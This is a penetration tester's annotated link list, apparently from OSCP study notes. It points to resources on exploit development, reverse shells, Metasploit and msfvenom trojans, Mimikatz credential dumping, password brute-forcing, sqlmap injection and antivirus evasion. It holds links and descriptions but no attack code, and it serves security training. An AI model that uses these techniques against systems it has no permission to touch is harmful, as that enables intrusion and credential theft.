Disclaimer: Use this information only in a controlled manner and only on systems you have permission to use. Any illegal use is your responsibility as is learning the laws in your country, state, province or county and abiding by them.
*Page under construction. Working on formatting and removing old links. A majority of these came from my OSCP notes and are a little old by now.
*Page under construction. Working on formatting and removing old links. A majority of these came from my OSCP notes and are a little old by now.
General Offensive Links
General Blogs
Site |
Description |
Interesting articles on exploits, reversing and other tradecraft. |
|
Articles on shellcode, exploits, and Web attacks. |
General Knowledge
Site |
Description |
A site dedicated to the PTES testing methodology. If you are wondering what is involved and how an engagement flows, this is your site. |
|
He covers a variety of pen testing topics including having "Zero to hero" style courses and discusses how to get into the industry. |
|
A great site that is basically an encyclopedia of techniques. |
|
A great resource for command syntax for common tools and techniques. |
|
A great resource for many things pen testing. Tool usage, various techniques, you name it an article is probably here. |
Link Lists
Site |
Description |
One of the best list of links I have found for pen testing. |
|
Before HTB there was Vulnhub. This is a list of their recommend resources. A great list of resources for learning. |
|
Jhaddix is one of the big influencers in the bug bounty space and an awesome instructor. This is his list of book marks. |
Exploits/Assembly
Exploit Dev
Site |
Description |
An older tutorial on writing a Windows buffer overflow. |
|
A guide on cross-compiling code. Important if you are compiling an exploit for another nix system. |
|
An older tutorial on writing an overflow. Very detailed description of the execution flow, |
|
A great tool for seeing how C++ code translates to assembly instructions. |
|
A blog that doesn't look to have any current content which is why its not listed in blogs. But, it has great posts on exploits and scripting. |
Web
Web App Hacking
Site |
Description |
Tons of content on XSS |
|
Lists the file types indexable by Google. Could be useful to know during recon activities. |
Bug Bounties
Site |
Description |
One of the top influencers in the bug bounty space. He does live recon, CTF walkthroughs, and explanation videos for web application hacking content. |
|
One of the top influencers in the bug bounty space. She focuses on explanation videos for web application hacking content and bug bounties. |
|
One of the top influencers in the bug bounty space. He does interviews with bug bounty hunters, talks about new tools, explains his bounties, tutorials on specific techniques, and talks about mental health. |
Intel Gathering
Open Source Intel (OSINT)
Site |
Description |
Contains vast information on Google Dorking. |
Network Hacking
Recon
Site |
Description |
If you are pivoting on a network, you don't always have nmap. These are options to do a ping sweep with some quick scripts. |
File Transfer
Site |
Description |
One of my favorite ways of transferring files in a CTF environment. |
Privilege Escalation
Site |
Description |
One of my favorite Windows privesc resources. It doesn't just have techniques but rather walks you through the process. |
|
A classic resource for Linux priv ex. Used this extensively in OSCP. |
Lateral Movement
Site |
Description |
A detailed explanation of how pass the hash works. |
|
An explanation of how to use PTH to get an RDP session. |
|
A great resource on pivoting in an environment with SSH. |
Shells
Site |
Description |
A great cheat sheet covering different ways to get a reverse shell. One of my favorite resources on this topic. |
|
Cheatsheet for spawning tty shells. |
|
Exactly what it says, getting a netcat shell without using the 'e' flag. I have used this in various labs and CTF's on systems that didn't support 'e'. |
|
You can do some cool stuff with SSH. This resource covers many of those things. like forwarding and proxying. |
Metasploit/Meterpreter
https://www.offensive-security.com/metasploit-unleashed/ - Metasploit Unleashed
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ - Metasploit Commands
https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ - Upgrade Metasploit shells
http://netsec.ws/?p=262 - Converting Metasploit Modules to standalone
https://www.offensive-security.com/metasploit-unleashed/portfwd/ - Port forwarding with Metasploit
https://cyberarms.wordpress.com/2013/09/22/recovering-plain-text-passwords-with-metasploit-and-mimikatz/ - Mimikatz/Metasploit
https://www.offensive-security.com/metasploit-unleashed/mimikatz/ - Meterpreter Mimikatz
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit - Metasploit Reverse Shell
https://www.rapid7.com/db/modules/auxiliary/scanner/smtp/smtp_version - SMTP Banner grabbing
https://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot - Pivot with Meterpreter
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/ - Metasploit Post Modules
https://www.offensive-security.com/metasploit-unleashed/Pivoting/ - Pivot with Metasploit
https://pentestlab.blog/2012/07/27/attacking-mysql-with-metasploit/ - MySQL attack with Metasploit
https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/ - MSSQL Hunting with Metasploit
https://sathisharthars.com/2014/07/07/evade-windows-firewall-by-ssh-tunneling-using-metasploit/ - Windows Firewall Evasion
https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/ - Msfvenom binary trojan
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/ - Client-side exploits MSF
http://netsec.ws/?p=331 - Msfvenom payload cheatsheet
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/ - Writing Meterpreter scripts
https://www.offensive-security.com/metasploit-unleashed/john-ripper/ - John w/Metasploit
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ - Metasploit Commands
https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ - Upgrade Metasploit shells
http://netsec.ws/?p=262 - Converting Metasploit Modules to standalone
https://www.offensive-security.com/metasploit-unleashed/portfwd/ - Port forwarding with Metasploit
https://cyberarms.wordpress.com/2013/09/22/recovering-plain-text-passwords-with-metasploit-and-mimikatz/ - Mimikatz/Metasploit
https://www.offensive-security.com/metasploit-unleashed/mimikatz/ - Meterpreter Mimikatz
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit - Metasploit Reverse Shell
https://www.rapid7.com/db/modules/auxiliary/scanner/smtp/smtp_version - SMTP Banner grabbing
https://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot - Pivot with Meterpreter
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/ - Metasploit Post Modules
https://www.offensive-security.com/metasploit-unleashed/Pivoting/ - Pivot with Metasploit
https://pentestlab.blog/2012/07/27/attacking-mysql-with-metasploit/ - MySQL attack with Metasploit
https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/ - MSSQL Hunting with Metasploit
https://sathisharthars.com/2014/07/07/evade-windows-firewall-by-ssh-tunneling-using-metasploit/ - Windows Firewall Evasion
https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/ - Msfvenom binary trojan
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/ - Client-side exploits MSF
http://netsec.ws/?p=331 - Msfvenom payload cheatsheet
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/ - Writing Meterpreter scripts
https://www.offensive-security.com/metasploit-unleashed/john-ripper/ - John w/Metasploit
Passwords
https://wiki.skullsecurity.org/Passwords - Dictionaries/Leaks/Misc
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/ - ncrack, hydra, and medusa
http://foofus.net/goons/jmk/medusa/medusa.html - Medusa
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass - Mimikatz
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/ - ncrack, hydra, and medusa
http://foofus.net/goons/jmk/medusa/medusa.html - Medusa
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass - Mimikatz
Database Hacking
https://www.binarytides.com/sqlmap-hacking-tutorial/ - Sqlmap guide
http://digitalforensicstips.com/2013/01/telling-sqlmap-to-try-harder/ - Sqlmap guide
http://sqlzoo.net/wiki/SQL_Tutorial - SQL Tutorial
https://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/ - Sqlmap Tricks
http://digitalforensicstips.com/2013/01/telling-sqlmap-to-try-harder/ - Sqlmap guide
http://sqlzoo.net/wiki/SQL_Tutorial - SQL Tutorial
https://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/ - Sqlmap Tricks
Evasion Techniques
https://www.veil-framework.com/guidesvideos/ - Veil Framework video guides